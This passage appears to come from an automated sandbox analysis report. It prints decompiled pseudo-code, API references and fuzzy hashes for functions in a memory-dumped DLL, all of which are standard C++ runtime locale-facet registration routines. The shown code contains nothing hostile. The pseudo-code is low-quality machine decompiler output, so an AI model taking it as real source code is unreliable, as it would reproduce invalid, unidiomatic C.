															_push( *((intOrPtr*)(_t178 + 8)));
															_push(_t178 - 0x10);
															_t100 = E6E1A6328(_t125, _t167, _t172);
															_pop(_t149);
															__eflags = _t100 - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ecb1a, _t125, _t167, _t172, 4);
																_t173 = _t149;
																 *(_t178 - 0x10) = _t173;
																 *((intOrPtr*)(_t173 + 4)) =  *((intOrPtr*)(_t178 + 0xc));
																_push( *((intOrPtr*)(_t178 + 0x14)));
																_t55 = _t178 - 4;
																 *_t55 =  *(_t178 - 4) & 0x00000000;
																__eflags =  *_t55;
																 *_t173 = 0x6e1f25a4;
																 *((char*)(_t173 + 0x28)) =  *((intOrPtr*)(_t178 + 0x10));
																E6E1A7184(_t125, _t149, _t162, _t167, _t173,  *_t55);
																return E6E1A9D88(_t173,  *((intOrPtr*)(_t178 + 8)));
															} else {
																_t167 =  *(_t178 - 0x10);
																 *(_t178 - 0x10) = _t167;
																 *(_t178 - 4) = 1;
																E6E1911C1(__eflags, _t167);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 4))))();
																 *0x6e221774 = _t167;
																goto L26;
															}
														} else {
															_t167 = _t172;
															goto L26;
														}
													}
												} else {
													_t166 =  *(_t178 - 0x10);
													 *(_t178 - 0x10) = _t166;
													 *(_t178 - 4) = 1;
													E6E1911C1(__eflags, _t166);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 4))))();
													 *0x6e221770 = _t166;
													goto L19;
												}
											} else {
												_t166 = _t171;
												goto L19;
											}
										}
									} else {
										_t165 =  *(_t178 - 0x10);
										 *(_t178 - 0x10) = _t165;
										 *(_t178 - 4) = 1;
										E6E1911C1(__eflags, _t165);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 4))))();
										 *0x6e221768 = _t165;
										goto L12;
									}
								} else {
									_t165 = _t170;
									goto L12;
								}
							}
						} else {
							_t164 =  *(_t178 - 0x10);
							 *(_t178 - 0x10) = _t164;
							 *(_t178 - 4) = 1;
							E6E1911C1(__eflags, _t164);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 4))))();
							 *0x6e22176c = _t164;
							goto L5;
						}
					} else {
						_t164 = _t169;
						goto L5;
					}
				}
			}

0x6e1a5bf4
0x6e1a5bfb
0x6e1a5c05
0x6e1a5c0a
0x6e1a5c15
0x6e1a5c19
0x6e1a5c25
0x6e1a5c2a
0x6e1a5c2e
0x6e1a5c73
0x6e1a5c76
0x6e1a5c82
0x6e1a5c30
0x6e1a5c32
0x6e1a5c38
0x6e1a5c3e
0x6e1a5c46
0x6e1a5c49
0x6e1a5c83
0x6e1a5c88
0x6e1a5c90
0x6e1a5c9a
0x6e1a5c9f
0x6e1a5caa
0x6e1a5cae
0x6e1a5cbf
0x6e1a5cc1
0x6e1a5cc3
0x6e1a5d08
0x6e1a5d0b
0x6e1a5d17
0x6e1a5cc5
0x6e1a5cc5
0x6e1a5cc7
0x6e1a5ccd
0x6e1a5cd3
0x6e1a5cdb
0x6e1a5cde
0x6e1a5d18
0x6e1a5d1d
0x6e1a5d25
0x6e1a5d2f
0x6e1a5d34
0x6e1a5d3f
0x6e1a5d43
0x6e1a5d54
0x6e1a5d56
0x6e1a5d58
0x6e1a5d9d
0x6e1a5da0
0x6e1a5dac
0x6e1a5d5a
0x6e1a5d5a
0x6e1a5d5c
0x6e1a5d62
0x6e1a5d68
0x6e1a5d70
0x6e1a5d73
0x6e1a5dad
0x6e1a5db2
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de9
0x6e1a5deb
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1
0x6e1a5d75
0x6e1a5d75
0x6e1a5d78
0x6e1a5d7c
0x6e1a5d80
0x6e1a5d8d
0x6e1a5d95
0x6e1a5d97
0x00000000
0x6e1a5d97
0x6e1a5d5e
0x6e1a5d5e
0x00000000
0x6e1a5d5e
0x6e1a5d5c
0x6e1a5ce0
0x6e1a5ce0
0x6e1a5ce3
0x6e1a5ce7
0x6e1a5ceb
0x6e1a5cf8
0x6e1a5d00
0x6e1a5d02
0x00000000
0x6e1a5d02
0x6e1a5cc9
0x6e1a5cc9
0x00000000
0x6e1a5cc9
0x6e1a5cc7
0x6e1a5c4b
0x6e1a5c4b
0x6e1a5c4e
0x6e1a5c52
0x6e1a5c56
0x6e1a5c63
0x6e1a5c6b
0x6e1a5c6d
0x00000000
0x6e1a5c6d
0x6e1a5c34
0x6e1a5c34
0x00000000
0x6e1a5c34
0x6e1a5c32

APIs

__EH_prolog3.LIBCMT ref: 6E1A5BFB
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C05

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E1A5C3F
std::_Facet_Register.LIBCPMT ref: 6E1A5C56
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5C76
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5C83

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 92169b04181ed09b5b8de6d8a6ac392827505e02bf7a5a62503076739adc03d4
Instruction ID: 82fc6aaa63711f39969082ff4d791366afad50befdd7dc3878c9ab6c5f535116
Opcode Fuzzy Hash: 92169b04181ed09b5b8de6d8a6ac392827505e02bf7a5a62503076739adc03d4
Instruction Fuzzy Hash: A601C4399046199FCF05DBE8D9146FD777DAF84714F644809E911AB2C4CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19361B, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E19361B(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				char _v20;
				intOrPtr* _t22;
				void* _t27;
				char* _t41;
				void* _t48;
				char* _t49;

				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5( &_v20, 0);
				_t48 =  *0x6e2215f4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t48;
				_t22 = E6E162171(_a8, E6E161F29(__ebx, 0x6e2215e8, __edi, _t48));
				_t46 = _t22;
				if(_t22 != 0) {
					L5:
					E6E18F30C( &_v20);
					return E6E1A9D88(_t46);
				} else {
					if(_t48 == 0) {
						_push(_a8);
						_push( &_v16);
						_t27 = E6E193CFA(__ebx, _t46, _t48);
						_pop(_t41);
						__eflags = _t27 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							_push(_t48);
							_t49 = _t41;
							_t15 = _t49 + 0x10;
							 *_t15 =  *(_t49 + 0x10) & 0x00000000;
							__eflags =  *_t15;
							 *((intOrPtr*)(_t49 + 0x14)) = 0xf;
							 *_t49 = 0;
							E6E1958BE(_t41, _a4, _a8);
							return _t49;
						} else {
							_t46 = _v16;
							_v16 = _t46;
							_v4 = 1;
							E6E1911C1(__eflags, _t46);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t46 + 4))))();
							 *0x6e2215f4 = _t46;
							goto L5;
						}
					} else {
						_t46 = _t48;
						goto L5;
					}
				}
			}

0x6e193622
0x6e19362c
0x6e193631
0x6e19363c
0x6e193640
0x6e19364c
0x6e193651
0x6e193655
0x6e19369a
0x6e19369d
0x6e1936a9
0x6e193657
0x6e193659
0x6e19365f
0x6e193665
0x6e193666
0x6e19366c
0x6e19366d
0x6e193670
0x6e1936aa
0x6e1936af
0x6e1936b3
0x6e1936b7
0x6e1936bc
0x6e1936bc
0x6e1936bc
0x6e1936c0
0x6e1936c7
0x6e1936ca
0x6e1936d3
0x6e193672
0x6e193672
0x6e193675
0x6e193679
0x6e19367d
0x6e19368a
0x6e193692
0x6e193694
0x00000000
0x6e193694
0x6e19365b
0x6e19365b
0x00000000
0x6e19365b
0x6e193659

APIs

__EH_prolog3.LIBCMT ref: 6E193622
std::_Lockit::_Lockit.LIBCPMT ref: 6E19362C

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

numpunct.LIBCPMT ref: 6E193666
std::_Facet_Register.LIBCPMT ref: 6E19367D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19369D
Concurrency::cancel_current_task.LIBCPMT ref: 6E1936AA

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1613453239-0
Opcode ID: 81e031490ba8dee918a3d062e9805d500295193485a825c337b78dc5f440ec39
Instruction ID: 0028519176401f016a80325fdffecf9521edcbbbd80284b082ae5a5b868edfb4
Opcode Fuzzy Hash: 81e031490ba8dee918a3d062e9805d500295193485a825c337b78dc5f440ec39
Instruction Fuzzy Hash: CC01C435900516CFCB05DBE4C918AED77BABF84314F244819E829AB380CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19965D, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E19965D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t74;
				void* _t123;
				signed int _t182;
				void* _t198;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				void* _t217;

				_t152 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t217 - 0x14, 0);
				_t206 =  *0x6e221718; // 0x0
				 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
				 *(_t217 - 0x10) = _t206;
				_t74 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(__ebx, 0x6e2216c4, __edi, _t206));
				_t200 = _t74;
				if(_t74 != 0) {
					L5:
					E6E18F30C(_t217 - 0x14);
					return E6E1A9D88(_t200);
				} else {
					if(_t206 == 0) {
						_push( *((intOrPtr*)(_t217 + 8)));
						_push(_t217 - 0x10);
						__eflags = E6E19B0BD(__ebx, _t200, _t206) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t152, _t200, _t206, 8);
							E6E18F2A5(_t217 - 0x14, 0);
							_t207 =  *0x6e221734; // 0x0
							 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
							 *(_t217 - 0x10) = _t207;
							_t201 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e2216e0, _t200, _t207));
							__eflags = _t201;
							if(_t201 != 0) {
								L12:
								E6E18F30C(_t217 - 0x14);
								return E6E1A9D88(_t201);
							} else {
								__eflags = _t207;
								if(_t207 == 0) {
									_push( *((intOrPtr*)(_t217 + 8)));
									_push(_t217 - 0x10);
									__eflags = E6E19B138(_t152, _t201, _t207) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t152, _t201, _t207, 8);
										E6E18F2A5(_t217 - 0x14, 0);
										_t208 =  *0x6e221704; // 0x0
										 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
										 *(_t217 - 0x10) = _t208;
										_t202 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e2216b8, _t201, _t208));
										__eflags = _t202;
										if(_t202 != 0) {
											L19:
											E6E18F30C(_t217 - 0x14);
											return E6E1A9D88(_t202);
										} else {
											__eflags = _t208;
											if(_t208 == 0) {
												_push( *((intOrPtr*)(_t217 + 8)));
												_push(_t217 - 0x10);
												__eflags = E6E19B1A4(_t152, _t202, _t208) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t152, _t202, _t208, 8);
													E6E18F2A5(_t217 - 0x14, 0);
													_t209 =  *0x6e221738; // 0x0
													 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
													 *(_t217 - 0x10) = _t209;
													_t203 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e2216e4, _t202, _t209));
													__eflags = _t203;
													if(_t203 != 0) {
														L26:
														E6E18F30C(_t217 - 0x14);
														return E6E1A9D88(_t203);
													} else {
														__eflags = _t209;
														if(_t209 == 0) {
															_push( *((intOrPtr*)(_t217 + 8)));
															_push(_t217 - 0x10);
															__eflags = E6E19B210(_t152, _t203, _t209) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t152, _t203, _t209, 8);
																E6E18F2A5(_t217 - 0x14, 0);
																_t210 =  *0x6e221708; // 0x0
																 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
																 *(_t217 - 0x10) = _t210;
																_t204 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e221698, _t203, _t210));
																__eflags = _t204;
																if(_t204 != 0) {
																	L33:
																	E6E18F30C(_t217 - 0x14);
																	return E6E1A9D88(_t204);
																} else {
																	__eflags = _t210;
																	if(_t210 == 0) {
																		_push( *((intOrPtr*)(_t217 + 8)));
																		_push(_t217 - 0x10);
																		_t123 = E6E19B284(_t152, _t204, _t210);
																		_pop(_t182);
																		__eflags = _t123 - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ecb1a, _t152, _t204, _t210, 4);
																			_t211 = _t182;
																			 *(_t217 - 0x10) = _t211;
																			 *((intOrPtr*)(_t211 + 4)) =  *((intOrPtr*)(_t217 + 0xc));
																			_push( *((intOrPtr*)(_t217 + 0x14)));
																			_t67 = _t217 - 4;
																			 *_t67 =  *(_t217 - 4) & 0x00000000;
																			__eflags =  *_t67;
																			 *_t211 = 0x6e1f225c;
																			 *((char*)(_t211 + 0x28)) =  *((intOrPtr*)(_t217 + 0x10));
																			E6E19F3D8(_t152, _t182, _t198, _t204, _t211,  *_t67);
																			return E6E1A9D88(_t211,  *((intOrPtr*)(_t217 + 8)));
																		} else {
																			_t204 =  *(_t217 - 0x10);
																			 *(_t217 - 0x10) = _t204;
																			 *(_t217 - 4) = 1;
																			E6E1911C1(__eflags, _t204);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t204 + 4))))();
																			 *0x6e221708 = _t204;
																			goto L33;
																		}
																	} else {
																		_t204 = _t210;
																		goto L33;
																	}
																}
															} else {
																_t203 =  *(_t217 - 0x10);
																 *(_t217 - 0x10) = _t203;
																 *(_t217 - 4) = 1;
																E6E1911C1(__eflags, _t203);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t203 + 4))))();
																 *0x6e221738 = _t203;
																goto L26;
															}
														} else {
															_t203 = _t209;
															goto L26;
														}
													}
												} else {
													_t202 =  *(_t217 - 0x10);
													 *(_t217 - 0x10) = _t202;
													 *(_t217 - 4) = 1;
													E6E1911C1(__eflags, _t202);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t202 + 4))))();
													 *0x6e221704 = _t202;
													goto L19;
												}
											} else {
												_t202 = _t208;
												goto L19;
											}
										}
									} else {
										_t201 =  *(_t217 - 0x10);
										 *(_t217 - 0x10) = _t201;
										 *(_t217 - 4) = 1;
										E6E1911C1(__eflags, _t201);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t201 + 4))))();
										 *0x6e221734 = _t201;
										goto L12;
									}
								} else {
									_t201 = _t207;
									goto L12;
								}
							}
						} else {
							_t200 =  *(_t217 - 0x10);
							 *(_t217 - 0x10) = _t200;
							 *(_t217 - 4) = 1;
							E6E1911C1(__eflags, _t200);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t200 + 4))))();
							 *0x6e221718 = _t200;
							goto L5;
						}
					} else {
						_t200 = _t206;
						goto L5;
					}
				}
			}

0x6e19965d
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e19968e
0x6e199693
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b

APIs

__EH_prolog3.LIBCMT ref: 6E199664
std::_Lockit::_Lockit.LIBCPMT ref: 6E19966E

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

numpunct.LIBCPMT ref: 6E1996A8
std::_Facet_Register.LIBCPMT ref: 6E1996BF
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1996DF
Concurrency::cancel_current_task.LIBCPMT ref: 6E1996EC

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1613453239-0
Opcode ID: 2d68e501d6159114880b1aab310b07ffb7af8af61c54d284db74fb5996fab123
Instruction ID: 245922cce948cd74e94cef248f2f37043561a4d65e63d741d66994c31787f0b7
Opcode Fuzzy Hash: 2d68e501d6159114880b1aab310b07ffb7af8af61c54d284db74fb5996fab123
Instruction Fuzzy Hash: 6E01D6759001198FCF05DBE4C864AFE77B9AF84314F240809E821AB290CF359AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199409, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E199409(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t122;
				void* _t215;
				signed int _t314;
				void* _t342;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t373;

				_t260 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t373 - 0x14, 0);
				_t354 =  *0x6e2216fc; // 0x0
				 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
				 *(_t373 - 0x10) = _t354;
				_t122 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(__ebx, 0x6e2216b0, __edi, _t354));
				_t344 = _t122;
				if(_t122 != 0) {
					L5:
					E6E18F30C(_t373 - 0x14);
					return E6E1A9D88(_t344);
				} else {
					if(_t354 == 0) {
						_push( *((intOrPtr*)(_t373 + 8)));
						_push(_t373 - 0x10);
						__eflags = E6E19AF00(__ebx, _t344, _t354) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t260, _t344, _t354, 8);
							E6E18F2A5(_t373 - 0x14, 0);
							_t355 =  *0x6e221710; // 0x0
							 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
							 *(_t373 - 0x10) = _t355;
							_t345 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e2216bc, _t344, _t355));
							__eflags = _t345;
							if(_t345 != 0) {
								L12:
								E6E18F30C(_t373 - 0x14);
								return E6E1A9D88(_t345);
							} else {
								__eflags = _t355;
								if(_t355 == 0) {
									_push( *((intOrPtr*)(_t373 + 8)));
									_push(_t373 - 0x10);
									__eflags = E6E19AF85(_t260, _t345, _t355) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t260, _t345, _t355, 8);
										E6E18F2A5(_t373 - 0x14, 0);
										_t356 =  *0x6e2216e8; // 0x0
										 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
										 *(_t373 - 0x10) = _t356;
										_t346 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e22169c, _t345, _t356));
										__eflags = _t346;
										if(_t346 != 0) {
											L19:
											E6E18F30C(_t373 - 0x14);
											return E6E1A9D88(_t346);
										} else {
											__eflags = _t356;
											if(_t356 == 0) {
												_push( *((intOrPtr*)(_t373 + 8)));
												_push(_t373 - 0x10);
												__eflags = E6E19AFED(_t260, _t346, _t356) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t260, _t346, _t356, 8);
													E6E18F2A5(_t373 - 0x14, 0);
													_t357 =  *0x6e221714; // 0x0
													 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
													 *(_t373 - 0x10) = _t357;
													_t347 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e2216c0, _t346, _t357));
													__eflags = _t347;
													if(_t347 != 0) {
														L26:
														E6E18F30C(_t373 - 0x14);
														return E6E1A9D88(_t347);
													} else {
														__eflags = _t357;
														if(_t357 == 0) {
															_push( *((intOrPtr*)(_t373 + 8)));
															_push(_t373 - 0x10);
															__eflags = E6E19B055(_t260, _t347, _t357) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t260, _t347, _t357, 8);
																E6E18F2A5(_t373 - 0x14, 0);
																_t358 =  *0x6e221718; // 0x0
																 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
																 *(_t373 - 0x10) = _t358;
																_t348 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e2216c4, _t347, _t358));
																__eflags = _t348;
																if(_t348 != 0) {
																	L33:
																	E6E18F30C(_t373 - 0x14);
																	return E6E1A9D88(_t348);
																} else {
																	__eflags = _t358;
																	if(_t358 == 0) {
																		_push( *((intOrPtr*)(_t373 + 8)));
																		_push(_t373 - 0x10);
																		__eflags = E6E19B0BD(_t260, _t348, _t358) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t260, _t348, _t358, 8);
																			E6E18F2A5(_t373 - 0x14, 0);
																			_t359 =  *0x6e221734; // 0x0
																			 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
																			 *(_t373 - 0x10) = _t359;
																			_t349 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e2216e0, _t348, _t359));
																			__eflags = _t349;
																			if(_t349 != 0) {
																				L40:
																				E6E18F30C(_t373 - 0x14);
																				return E6E1A9D88(_t349);
																			} else {
																				__eflags = _t359;
																				if(_t359 == 0) {
																					_push( *((intOrPtr*)(_t373 + 8)));
																					_push(_t373 - 0x10);
																					__eflags = E6E19B138(_t260, _t349, _t359) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t260, _t349, _t359, 8);
																						E6E18F2A5(_t373 - 0x14, 0);
																						_t360 =  *0x6e221704; // 0x0
																						 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
																						 *(_t373 - 0x10) = _t360;
																						_t350 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e2216b8, _t349, _t360));
																						__eflags = _t350;
																						if(_t350 != 0) {
																							L47:
																							E6E18F30C(_t373 - 0x14);
																							return E6E1A9D88(_t350);
																						} else {
																							__eflags = _t360;
